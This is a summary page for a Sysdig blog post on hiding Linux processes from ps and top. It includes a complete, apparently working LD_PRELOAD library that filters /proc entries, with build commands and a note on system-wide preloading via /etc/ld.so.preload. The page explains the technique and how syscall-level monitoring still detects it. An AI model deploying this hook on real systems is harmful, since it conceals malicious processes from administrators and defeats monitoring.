
Hiding Linux processes for fun + profit

Blog post from Sysdig

Author: Gianluca Borello
Word count: 2,917
Language: English
Summary

Gianluca Borello explores how a process can be hidden on Linux from monitoring tools such as `ps` and `top`. These tools do not ask the kernel for a process list directly; they enumerate the `/proc` directory with `readdir()` and read `/proc/<pid>/` for each entry. Using the dynamic linker's `LD_PRELOAD` mechanism, Borello builds a small shared library that overrides libc's `readdir()` and drops the entry for a chosen process, so the script he wants to conceal simply disappears from every tool that lists `/proc` that way. The post weighs other options, such as patching the monitoring binaries themselves or hooking kernel system calls, but settles on preloading because it is simple, needs no kernel changes, and works against unmodified tools. Although the process is invisible to the usual userland tools, Borello shows that Sysdig still sees it: Sysdig captures system calls at the kernel boundary, so a userland `LD_PRELOAD` hook cannot filter what it observes. The experiment highlights the versatility of the `/proc` file system and how hard it is to conceal activity completely, and it argues for monitoring that draws on system calls as well as on the file-system view that `/proc` provides.
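The following is an added example (written for this page, not Borello's code from the post) of the preload technique the summary describes: a shared library that defines its own `readdir()`, forwards to libc's real `readdir()` through `dlsym(RTLD_NEXT, ...)`, and skips any `/proc/<pid>` entry whose `/proc/<pid>/comm` matches a chosen name. The hidden process name `evil.sh`, the helper names `is_pid_entry`, `comm_matches`, `dir_path` and `pid_should_hide`, and the library name `libhide.so` are assumptions for illustration.

```c
#define _GNU_SOURCE          /* needed for RTLD_NEXT in glibc's dlfcn.h */
#include <dirent.h>
#include <dlfcn.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#ifndef RTLD_NEXT            /* fallback if _GNU_SOURCE was not seen first */
#define RTLD_NEXT ((void *) -1L)
#endif

/* Name of the process to hide, as it appears in /proc/<pid>/comm.
 * Assumption for this example: a hypothetical script called "evil.sh". */
#define HIDDEN_COMM "evil.sh"

typedef struct dirent *(*readdir_fn)(DIR *);

/* True if every character of name is a decimal digit, i.e. the entry is a
 * /proc/<pid> directory rather than "self", "cpuinfo", "sys", and so on. */
int is_pid_entry(const char *name) {
    if (*name == '\0') return 0;
    for (; *name; name++)
        if (*name < '0' || *name > '9') return 0;
    return 1;
}

/* The kernel exposes /proc/<pid>/comm as the task name plus a trailing '\n',
 * truncated to 15 characters (TASK_COMM_LEN - 1).  Compare the buffer to the
 * hidden name ignoring the newline; a 15-character comm is treated as a
 * prefix match because the kernel may have truncated a longer name. */
int comm_matches(const char *comm_buf, const char *hidden) {
    size_t n = strcspn(comm_buf, "\n");
    return strncmp(comm_buf, hidden, n) == 0 && (hidden[n] == '\0' || n >= 15);
}

/* Recover the path a DIR* was opened on by reading the /proc/self/fd link. */
static int dir_path(DIR *dirp, char *buf, size_t buflen) {
    char link[64];
    snprintf(link, sizeof link, "/proc/self/fd/%d", dirfd(dirp));
    ssize_t n = readlink(link, buf, buflen - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return 0;
}

/* Read /proc/<pid>/comm and decide whether this pid should be concealed. */
static int pid_should_hide(const char *pid) {
    char path[PATH_MAX], comm[32];
    snprintf(path, sizeof path, "/proc/%s/comm", pid);
    FILE *f = fopen(path, "r");
    if (!f) return 0;                       /* process already gone: nothing to hide */
    int hide = fgets(comm, sizeof comm, f) != NULL && comm_matches(comm, HIDDEN_COMM);
    fclose(f);
    return hide;
}

/* Our readdir(): forwards to libc's readdir (located with RTLD_NEXT) and
 * silently skips matching pid entries when the directory being listed is /proc,
 * so ps, top and anything else that walks /proc never see the process. */
struct dirent *readdir(DIR *dirp) {
    static readdir_fn real_readdir;
    if (!real_readdir)
        *(void **)(&real_readdir) = dlsym(RTLD_NEXT, "readdir");

    char path[PATH_MAX];
    int in_proc = dir_path(dirp, path, sizeof path) == 0 && strcmp(path, "/proc") == 0;

    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL) {
        if (in_proc && is_pid_entry(ent->d_name) && pid_should_hide(ent->d_name))
            continue;                       /* drop the entry */
        return ent;
    }
    return NULL;
}

/* Build:  gcc -shared -fPIC -o libhide.so hide.c -ldl
 * Use:    LD_PRELOAD=./libhide.so ps aux      (the hidden process is absent)
 * System-wide preloading would go through /etc/ld.so.preload instead. */
```

Two caveats a practitioner should keep in mind. First, a 32-bit `ps` built with `_FILE_OFFSET_BITS=64` calls `readdir64()` rather than `readdir()`, so a complete hook overrides both. Second, nothing here touches the kernel: the hidden process still performs `execve()`, `clone()`, `read()` and every other system call, and the `getdents()` calls that `ps` itself issues still return the full `/proc` listing before the hook filters it in userland. That is precisely why a system-call-based tool such as Sysdig keeps seeing the process while `ps` and `top` do not.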
